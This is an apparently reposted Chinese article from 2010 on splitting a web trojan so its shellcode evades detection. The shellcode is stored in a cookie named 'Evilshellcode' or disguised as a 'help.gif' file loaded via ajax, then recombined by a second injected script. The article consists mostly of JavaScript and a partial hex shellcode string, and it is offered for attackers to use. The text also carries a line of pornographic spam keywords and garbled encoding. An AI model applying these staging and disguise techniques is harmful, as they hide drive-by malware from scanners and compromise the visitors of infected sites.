欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一個(gè)網(wǎng)馬的tips實(shí)現(xiàn)分析

 更新時(shí)間:2010年11月28日 20:22:27   作者:  
把網(wǎng)馬拆分,shellcode代碼存在另一個(gè)地方。好比把一個(gè)網(wǎng)馬的shellcode存在cookie里,別一個(gè)頁面來調(diào)用?;蚴谴嬖诹硪粋€(gè)文件里用ajax來調(diào)用。當(dāng)然想存更多的代碼也可以。
cookie示例代碼:
復(fù)制代碼 代碼如下:

//存放
function setCookie(sVar, sVal){
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
document.cookie = theCookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCookie('Evilshellcode', shellcode);
//取出
function getCookie(sVar){
cookies = document.cookie.split('; ');
for(var i = 1; i <= cookies.length; i++){
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCookie('Evilshellcode'))


cookie存放的話,可以掛兩次,第一次掛cookie寫入代碼無害,第二次再取出來結(jié)合新掛的代碼來運(yùn)行。怎么用隨你了。

ajax來調(diào)用
復(fù)制代碼 代碼如下:

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script>
var shellcode = $.ajax({
url: "help.gif",
async: false
}).responseText

help.gif內(nèi)容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

相關(guān)文章

最新評論